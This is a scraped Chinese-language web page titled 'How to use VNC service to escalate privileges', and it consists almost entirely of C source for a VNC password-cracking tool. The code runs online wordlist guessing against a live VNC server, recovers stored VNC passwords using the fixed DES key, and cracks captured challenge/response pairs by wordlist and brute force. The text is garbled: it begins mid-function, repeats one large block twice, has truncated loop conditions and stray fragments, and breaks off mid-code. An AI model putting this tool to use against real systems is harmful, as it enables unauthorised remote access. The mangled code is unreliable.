如何利用VNC服务提升权限
减小字体
增大字体>1) {
printf("Authentication type: ");
for (i=0;i<4;i++) { printf("%x ",atype[i]); }
printf("\n");
}
switch (atype[3]) {
case 0:
fprintf(stderr,"Server told me: connection close\n");
if (verbose) {
// try to retrieve the reason
memset(servertext,0,sizeof(servertext));
if (recv(sfd,servertext,sizeof(servertext),0)<0) {
fprintf(stderr,"recv() in verbose");
exit(-1);
} else {
sthelp=servertext;
sthelp+=4;
fprintf(stderr,"Server says: %s\n",sthelp);
}
if (verbose) printf("\tWaiting for blocking disable\n");
Sleep(redosleep*1000);
if ((redocount++)<3) {
goto ReDoClosed;
} else {
fprintf(stderr,"\tgiving up (increase -R)\n");
}
}
exit(-1);
break; /* not reached */
case 1:
printf( "\n>>>>>>>>>>>>>>>\n"
"Server does not require authentication!\n"
">>>>>>>>>>>>>>>\n");
exit(-1);
break; /* not reached */
case 2:
if (verbose>1)
printf( "Authentication type 'VNC authentication' - fine\n");
break;
default:
fprintf(stderr,"Unknown authentication requested by server\n");
exit(-1);
}
redocount=0;
if (recv(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"recv()");
exit(-1);
}
if (verbose>1) {
printf("challange: ");
for (i=0;i<16;i++) { printf("%x ",challange[i]); }
printf("\n");
}
/* encrypt challange with password and send this fuck to the server */
vncEncryptBytes(challange,tryword);
if (send(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"auth send()");
exit(-1);
}
atype[3]=0;
if (recv(sfd,atype,sizeof(atype),0)<0) {
fprintf(stderr,"auth recv()");
exit(-1);
}
switch (atype[3]) {
case 0:
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
break; /* not reached */
case 1: /* 'normal' failed */
if (verbose) printf("failed\n");
break;
case 2: /* too many */
printf("Server is angry, waiting for calm down...\n");
sleep(10000);
break;
default:
fprintf(stderr,"Unknown response\n");
exit(-1);
}
shutdown(sfd,2);
closesocket(sfd);
memset(tryword,0,256);
}
free(tryword);
fclose(fd);
return 0;
}
void interactive(void) {
unsigned char *pass;
int i;
char c;
pass=(char *)sec_malloc(9);
for (i=0;i<8;i++) {
scanf("%x",&c);
pass[i]=c;
}
printf("Entered HEX String: ");
for (i=0;i<8;i++) { printf("%x ",pass[i]); }
printf("\n");
deskey(fixedkey,DE1);
des(pass,pass);
printf("VNC Password: %s\n",pass);
exit(0);
}
void cr_crack(char *wordlist) {
int i,j;
#define CRL 16
char chl[CRL+1];
char rsp[CRL+1];
char tchl[CRL+1];
char ts[3];
FILE *fd;
char *tryword;
char bft[9];
char cset1[] =
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";
#define cset1_len (92)
int cnt[8];
time_t t1,t2;
if (!wordlist) {
fprintf(stderr,"Supply wordlist file !");
exit(-1);
}
if ((!schallange)||(!sresponse)) {
usage();
}
if (
(strlen(schallange)!=16*2)
||(strlen(sresponse)!=16*2)
) {
fprintf(stderr,
"challange and response have to be 32 characters each\n");
exit (-1);
}
memset(&chl,0,CRL+1);
memset(&tchl,0,CRL+1);
memset(&rsp,0,CRL+1);
memset(&ts,0,3);
j=0;
for (i=0;i strncpy(ts,&schallange[j],2);
chl[i]=(unsigned char)strtol(ts,NULL,16);
strncpy(ts,&sresponse[j],2);
rsp[i]=(unsigned char)strtol(ts,NULL,16);
j+=2;
}
if (verbose) {
printf("Challange: ");
for (i=0;i printf("%x",(unsigned char) chl[i]);
}
printf("\n");
printf("Response : ");
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
}
if ((fd=fopen(wordlist,"rt"))==NULL) {
fprintf(stderr,"Could not open wordlist\n");
exit (-1);
}
tryword=sec_malloc(256);
while (fgets(tryword,255,fd)!=NULL) {
tryword[strlen(tryword)-1]='\0';
/* try this word */
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,tryword);
if (verbose>1) {
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
for (i=0;i printf("%x",(unsigned char) tchl[i]);
}
printf("\n");
}
if (!memcmp(tchl,rsp,CRL)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
} else {
if (verbose) printf("%s failed\n",tryword);
}
memset(tryword,0,256);
}
fclose(fd);
free(tryword);
printf( "-----------------------------------\n"
"Wordlist failed - going brute force\n"
"-----------------------------------\n" );
t1=GetTickCount();
bft[8]='\0';
bft[1]='\0';
printf("\tdepth I\n");
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
bft[2]='\0';
printf("\tdepth II\n");
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1
/************/
bft[3]='\0';
printf("\tdepth III\n");
for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1
} file://2
/************/
bft[4]='\0';
printf("\tdepth IV\n");
for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];
for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} /
printf("Authentication type: ");
for (i=0;i<4;i++) { printf("%x ",atype[i]); }
printf("\n");
}
switch (atype[3]) {
case 0:
fprintf(stderr,"Server told me: connection close\n");
if (verbose) {
// try to retrieve the reason
memset(servertext,0,sizeof(servertext));
if (recv(sfd,servertext,sizeof(servertext),0)<0) {
fprintf(stderr,"recv() in verbose");
exit(-1);
} else {
sthelp=servertext;
sthelp+=4;
fprintf(stderr,"Server says: %s\n",sthelp);
}
if (verbose) printf("\tWaiting for blocking disable\n");
Sleep(redosleep*1000);
if ((redocount++)<3) {
goto ReDoClosed;
} else {
fprintf(stderr,"\tgiving up (increase -R)\n");
}
}
exit(-1);
break; /* not reached */
case 1:
printf( "\n>>>>>>>>>>>>>>>\n"
"Server does not require authentication!\n"
">>>>>>>>>>>>>>>\n");
exit(-1);
break; /* not reached */
case 2:
if (verbose>1)
printf( "Authentication type 'VNC authentication' - fine\n");
break;
default:
fprintf(stderr,"Unknown authentication requested by server\n");
exit(-1);
}
redocount=0;
if (recv(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"recv()");
exit(-1);
}
if (verbose>1) {
printf("challange: ");
for (i=0;i<16;i++) { printf("%x ",challange[i]); }
printf("\n");
}
/* encrypt challange with password and send this fuck to the server */
vncEncryptBytes(challange,tryword);
if (send(sfd,challange,sizeof(challange),0)<0) {
fprintf(stderr,"auth send()");
exit(-1);
}
atype[3]=0;
if (recv(sfd,atype,sizeof(atype),0)<0) {
fprintf(stderr,"auth recv()");
exit(-1);
}
switch (atype[3]) {
case 0:
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
break; /* not reached */
case 1: /* 'normal' failed */
if (verbose) printf("failed\n");
break;
case 2: /* too many */
printf("Server is angry, waiting for calm down...\n");
sleep(10000);
break;
default:
fprintf(stderr,"Unknown response\n");
exit(-1);
}
shutdown(sfd,2);
closesocket(sfd);
memset(tryword,0,256);
}
free(tryword);
fclose(fd);
return 0;
}
void interactive(void) {
unsigned char *pass;
int i;
char c;
pass=(char *)sec_malloc(9);
for (i=0;i<8;i++) {
scanf("%x",&c);
pass[i]=c;
}
printf("Entered HEX String: ");
for (i=0;i<8;i++) { printf("%x ",pass[i]); }
printf("\n");
deskey(fixedkey,DE1);
des(pass,pass);
printf("VNC Password: %s\n",pass);
exit(0);
}
void cr_crack(char *wordlist) {
int i,j;
#define CRL 16
char chl[CRL+1];
char rsp[CRL+1];
char tchl[CRL+1];
char ts[3];
FILE *fd;
char *tryword;
char bft[9];
char cset1[] =
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";
#define cset1_len (92)
int cnt[8];
time_t t1,t2;
if (!wordlist) {
fprintf(stderr,"Supply wordlist file !");
exit(-1);
}
if ((!schallange)||(!sresponse)) {
usage();
}
if (
(strlen(schallange)!=16*2)
||(strlen(sresponse)!=16*2)
) {
fprintf(stderr,
"challange and response have to be 32 characters each\n");
exit (-1);
}
memset(&chl,0,CRL+1);
memset(&tchl,0,CRL+1);
memset(&rsp,0,CRL+1);
memset(&ts,0,3);
j=0;
for (i=0;i strncpy(ts,&schallange[j],2);
chl[i]=(unsigned char)strtol(ts,NULL,16);
strncpy(ts,&sresponse[j],2);
rsp[i]=(unsigned char)strtol(ts,NULL,16);
j+=2;
}
if (verbose) {
printf("Challange: ");
for (i=0;i printf("%x",(unsigned char) chl[i]);
}
printf("\n");
printf("Response : ");
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
}
if ((fd=fopen(wordlist,"rt"))==NULL) {
fprintf(stderr,"Could not open wordlist\n");
exit (-1);
}
tryword=sec_malloc(256);
while (fgets(tryword,255,fd)!=NULL) {
tryword[strlen(tryword)-1]='\0';
/* try this word */
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,tryword);
if (verbose>1) {
for (i=0;i printf("%x",(unsigned char) rsp[i]);
}
printf("\n");
for (i=0;i printf("%x",(unsigned char) tchl[i]);
}
printf("\n");
}
if (!memcmp(tchl,rsp,CRL)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",tryword);
free(tryword);
exit(0);
} else {
if (verbose) printf("%s failed\n",tryword);
}
memset(tryword,0,256);
}
fclose(fd);
free(tryword);
printf( "-----------------------------------\n"
"Wordlist failed - going brute force\n"
"-----------------------------------\n" );
t1=GetTickCount();
bft[8]='\0';
bft[1]='\0';
printf("\tdepth I\n");
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
bft[2]='\0';
printf("\tdepth II\n");
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1
/************/
bft[3]='\0';
printf("\tdepth III\n");
for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} // for 1
} file://2
/************/
bft[4]='\0';
printf("\tdepth IV\n");
for (cnt[3]=0;cnt[3] bft[3]=cset1[cnt[3]];
for (cnt[2]=0;cnt[2] bft[2]=cset1[cnt[2]];
for (cnt[1]=0;cnt[1] bft[1]=cset1[cnt[1]];
for (cnt[0]=0;cnt[0] bft[0]=cset1[cnt[0]];
if (verbose)
printf("try: %s\n",bft);
memcpy(tchl,chl,CRL);
vncEncryptBytes(tchl,bft);
if (!memcmp(tchl,rsp,16)) {
printf( "\n>>>>>>>>>>>>>>>\n"
"Password: %s\n"
">>>>>>>>>>>>>>>\n",
bft);
exit (0);
}
} // for 0
} /
